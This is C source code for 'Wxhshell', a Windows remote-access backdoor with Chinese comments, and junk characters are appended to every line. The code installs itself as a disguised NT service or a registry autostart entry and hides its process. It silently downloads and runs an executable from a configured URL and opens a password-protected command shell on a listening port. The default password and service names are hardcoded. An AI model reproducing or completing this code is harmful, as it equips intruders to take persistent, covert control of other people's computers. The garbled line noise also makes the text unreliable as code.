ULONG InheritedFromUniqueProcessId; ls?~+\Jb
} PROCESS_BASIC_INFORMATION; ",p;Sd
0QBiC]9
PROCNTQSIP NtQueryInformationProcess; 6|K5!2
d:_t-ZZo
static ENUMPROCESSMODULES g_pEnumProcessModules = NULL ; 3YeG$^y"
static GETMODULEBASENAME g_pGetModuleBaseName = NULL ; P!$Zx)T
H_B4
HANDLE hProcess; qPWP&k
PROCESS_BASIC_INFORMATION pbi; }HL]yDO
Yab%/z2:
HINSTANCE hInst = LoadLibraryA("PSAPI.DLL"); _A M*@|p,
if(NULL == hInst ) return 0; l3KVW5-!gS
xVf|G_5$
g_pEnumProcessModules = (ENUMPROCESSMODULES)GetProcAddress(hInst ,"EnumProcessModules"); 6 +Sxr
g_pGetModuleBaseName = (GETMODULEBASENAME)GetProcAddress(hInst, "GetModuleBaseNameA"); z
F_M*8=
NtQueryInformationProcess = (PROCNTQSIP)GetProcAddress(GetModuleHandle("ntdll"), "NtQueryInformationProcess"); &LmJ!^#
}wWKFX
if (!NtQueryInformationProcess) return 0; QgrpBG
\n" {qfn`r
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,GetCurrentProcessId()); j>*S5y.{
if(!hProcess) return 0; =4vy@7/
8&;UO{
if(NtQueryInformationProcess( hProcess, 0, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL)) return 0; b
IH;
Y_Eb'*PY
CloseHandle(hProcess); wGU*:k7p
Hj'x Atx5
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pbi.InheritedFromUniqueProcessId); _ftI*ni:<
if(hProcess==NULL) return 0; R]Vt Y7}i,
G
!<Z.]
HMODULE hMod; ~Xw"}S5
char procName[255]; -B>++r2A^
unsigned long cbNeeded; 214Ml0/%
B5gj_^
if(g_pEnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded)) g_pGetModuleBaseName(hProcess, hMod, procName, sizeof(procName)); jLy
tN[L@t9#cr
CloseHandle(hProcess); _geWE0
E
#m lS}~n
if(strstr(procName,"services")) return 1; // 以服务启动 7wWFr
F@^~7ZmP`
return 0; // 注册表启动 kHkpx52
} ^le<}
[M?}uK ^
// 主模块 T`/AY?#
int StartWxhshell(LPSTR lpCmdLine) t^VwR=i
{ Bm.afsM;
SOCKET wsl; F^l[GdUosK
BOOL val=TRUE; 5VRYO"D:
int port=0; |D'4uN8\
struct sockaddr_in door; lNNv|YiL
sD<a+Lw}x
if(wscfg.ws_autoins) Install(); uvgdY
h}-3\8 >
port=atoi(lpCmdLine); 1ofKt=|=
|o,YCzy|5
if(port<=0) port=wscfg.ws_port; SD#]$v
M])ZK
WSADATA data; )W|w C#
if(WSAStartup(MAKEWORD(2,2),&data)!=0) return 1; -T!f,g3vW
zh4#A
<e
if((wsl = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0)) == INVALID_SOCKET) return 1; 1pQn8[sc@
setsockopt(wsl,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val)); Ulhk$CPA
door.sin_family = AF_INET; }L
&^xe
door.sin_addr.s_addr = inet_addr("127.0.0.1"); X#d~zk[r2
door.sin_port = htons(port); xE1 eT,
k[0-CB
if(bind(wsl, (const struct sockaddr *) &door,sizeof(door)) == INVALID_SOCKET) { <CRP^_c
closesocket(wsl); mCRt8rY;
return 1; ;g8R4!J
} YX%[ipgB
CF&NFSti^
if(listen(wsl,2) == INVALID_SOCKET) { dL:-Y.?0M
closesocket(wsl); 85lCj-cs
return 1; M=.:,wRm
} QpZ:gM_
Wxhshell(wsl); >d~WH@o`G
WSACleanup(); PiY Y6i0
8 m5p_\&
return 0; P
D4Tz!F
$ oTdfb
} &
SiP\65N
MRQ.`IoS
// 以NT服务方式启动 _AYXc] 4%
VOID WINAPI NTServiceMain( DWORD dwArgc, LPSTR *lpszArgv ) OtSL*'7>
{
h1:aKm!
DWORD status = 0; KN$}tCU
DWORD specificError = 0xfffffff; `/_o!(Z`
r/& sub"X
serviceStatus.dwServiceType = SERVICE_WIN32; $Vsk Ew"|M
serviceStatus.dwCurrentState = SERVICE_START_PENDING; sLh==V;9
serviceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE; t
c[n&X
serviceStatus.dwWin32ExitCode = 0; c?P?yIz6p
serviceStatus.dwServiceSpecificExitCode = 0; :iFIQpk
serviceStatus.dwCheckPoint = 0; !
N|0x`
serviceStatus.dwWaitHint = 0; .e3NnOzyxS
`L:CA5sBud
hServiceStatusHandle = RegisterServiceCtrlHandler(wscfg.ws_svcname, NTServiceHandler); ;V^ 112|C
if (hServiceStatusHandle==0) return; 1D16
El<]b7
status = GetLastError(); ~+bv6qxg]\
if (status!=NO_ERROR) {zQS$VhXr
{ &-s'BT[PGq
serviceStatus.dwCurrentState = SERVICE_STOPPED; ?P4w]a
serviceStatus.dwCheckPoint = 0; Pa(^}n|
serviceStatus.dwWaitHint = 0; `IOs-%s
serviceStatus.dwWin32ExitCode = status; "@evXql3`
serviceStatus.dwServiceSpecificExitCode = specificError; OQ8 bI=?[x
SetServiceStatus(hServiceStatusHandle, &serviceStatus); X_qf"|i
return; y'FS/=u>0
} $\b$}wy*
"nm FzN
serviceStatus.dwCurrentState = SERVICE_RUNNING; ?!wgH9?8
serviceStatus.dwCheckPoint = 0; 'jmTXWq*
serviceStatus.dwWaitHint = 0; "dsU>3u
if(SetServiceStatus(hServiceStatusHandle, &serviceStatus)) StartWxhshell(""); }
$uxJB
} Mb"J@5P[4
aqYa{hXio
// 处理NT服务事件,比如:启动、停止 fKp#\tCc y
VOID WINAPI NTServiceHandler(DWORD fdwControl) *o-.6OxZ$
{ gWrgnlq
switch(fdwControl) ;`l'2
z@N
{ N+zKr/
case SERVICE_CONTROL_STOP: :q
ti
serviceStatus.dwWin32ExitCode = 0; ii%+jdi.
serviceStatus.dwCurrentState = SERVICE_STOPPED; i.=w]S
j
serviceStatus.dwCheckPoint = 0; iP@ZM=&wz
serviceStatus.dwWaitHint = 0; ,B08i
o-
{ SaC d0. h
SetServiceStatus(hServiceStatusHandle, &serviceStatus); 7uT:b!^f[
} aUxGzMZ
return; Kh(ZU^{n
case SERVICE_CONTROL_PAUSE: .U"8mP=&
serviceStatus.dwCurrentState = SERVICE_PAUSED; 7~9S 9
break; ygeDcnvR]
case SERVICE_CONTROL_CONTINUE: !h(|\"
}
serviceStatus.dwCurrentState = SERVICE_RUNNING; \(VTt|}By$
break; bfA=3S"0
case SERVICE_CONTROL_INTERROGATE: 9m|kgY# 4
break; p`nPhk,:b
}; ;2@BO-3K
SetServiceStatus(hServiceStatusHandle, &serviceStatus); +zu(
} m~@;~7I x
?s\
OUr
// 标准应用程序主函数 3ia^\ jw
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nCmdShow) ?I/qE='*
{ z>jUR,!GT
}K1JU`Lz
// 获取操作系统版本 T|6jGZS^|W
OsIsNt=GetOsVer(); !iH-#B-
GetModuleFileName(NULL,ExeFile,MAX_PATH); PlF87j (
XQ%?
// 从命令行安装 4
SHU
if(strpbrk(lpCmdLine,"iI")) Install(); Rop'e 8Q
ZIPl7tTw
// 下载执行文件 _
):d`O e
if(wscfg.ws_downexe) { [vMvV4,
if(URLDownloadToFile(0, wscfg.ws_fileurl, wscfg.ws_filenam, 0, 0)==S_OK) RaWG w
WinExec(wscfg.ws_filenam,SW_HIDE); lrWV#`6!+
} YFE&r
%7#-%{
if(!OsIsNt) { ]Pry>N3G5
// 如果时win9x,隐藏进程并且设置为注册表启动 YX=2jI
HideProc(); "]oO{'1X
StartWxhshell(lpCmdLine); $={:r/R`i
} P~s$EJL*
else CNr/U*+
if(StartFromService()) zG' "9kJx
// 以服务方式启动 NZP.0coY
StartServiceCtrlDispatcher(DispatchTable); 3uZJ.Fb
else 'eo
KZX+
// 普通方式启动 D\@m6=L
StartWxhshell(lpCmdLine); z\0CE]#T
GwG4LIp
return 0; AK=
h[2(
} V$"ujRp
>N;F8v
\A#1y\ok
R+nMy=I%8
=========================================== p8kr/uMP ;
ZunCKc
^qg?6S4
f;&]:2.j
sf OHl
Di@GY!
" M
t*6}Cl
B|C/
Rk6?
#include <stdio.h> DHw&+MY
#include <string.h> Mmo6MZ^
#include <windows.h> ,h{A^[yl
#include <winsock2.h> aWwPvd3
#include <winsvc.h> ]c<qM_HWg
#include <urlmon.h> rQOWLg!"
!eAo
#pragma comment (lib, "Ws2_32.lib") |\dZ'
#pragma comment (lib, "urlmon.lib") bn(`O1r[(
DNR~_3Aq
#define MAX_USER 100 // 最大客户端连接数 ZT[3aXS
#define BUF_SOCK 200 // sock buffer kM'"4[,nz
#define KEY_BUFF 255 // 输入 buffer ~%/Wupf
OdQT2PA_
#define REBOOT 0 // 重启 ari7 iF~j
#define SHUTDOWN 1 // 关机 6vp *9
osOVg0Gyj
#define DEF_PORT 5000 // 监听端口 'DCFezdf3
L>!8YUz7p$
#define REG_LEN 16 // 注册表键长度 +&X%<S
W
#define SVC_LEN 80 // NT服务名长度 Wxkx,q?
c(U
// 从dll定义API F$Ca;cP"
typedef DWORD (WINAPI pREGISTERSERVICEPROCESS) (DWORD,DWORD); k-E{d04-2
typedef LONG (WINAPI *PROCNTQSIP)(HANDLE,UINT,PVOID,ULONG,PULONG); \eGKkSy
typedef BOOL (WINAPI *ENUMPROCESSMODULES) (HANDLE hProcess, HMODULE * lphModule, DWORD cb, LPDWORD lpcbNeeded); Uz608u
typedef DWORD (WINAPI *GETMODULEBASENAME) (HANDLE hProcess, HMODULE hModule, LPTSTR lpBaseName, DWORD nSize); 9Ew7A(BG_3
ewuXpv%vwW
// wxhshell配置信息 B_ja&) !s1
struct WSCFG { ygSL
int ws_port; // 监听端口 rVtw-[p
char ws_passstr[REG_LEN]; // 口令 !)qQbk
int ws_autoins; // 安装标记, 1=yes 0=no ;' nL:\
char ws_regname[REG_LEN]; // 注册表键名 E15vq6 DKF
char ws_svcname[REG_LEN]; // 服务名 g7CXlT0Q6
char ws_svcdisp[SVC_LEN]; // 服务显示名 Z?NEO>h7
char ws_svcdesc[SVC_LEN]; // 服务描述信息 B51kV0
char ws_passmsg[SVC_LEN]; // 密码输入提示信息 `_5GG3@Ff
int ws_downexe; // 下载执行标记, 1=yes 0=no Qn:kz*:
char ws_fileurl[SVC_LEN]; // 下载文件的 url, "http://xxx/file.exe" _7kM]">j
char ws_filenam[SVC_LEN]; // 下载后保存的文件名 Y\+KoR';
u-DK_^v4M
}; !EF(*~r!9L
c 5`US
// default Wxhshell configuration !OcENV
struct WSCFG wscfg={DEF_PORT, ,Vd7V}t
"xuhuanlingzhe", 0{^H]Y
1, x.$1<w64t
"Wxhshell", Qbeeq6
"Wxhshell", 7ODaX.t->
"WxhShell Service", -DO&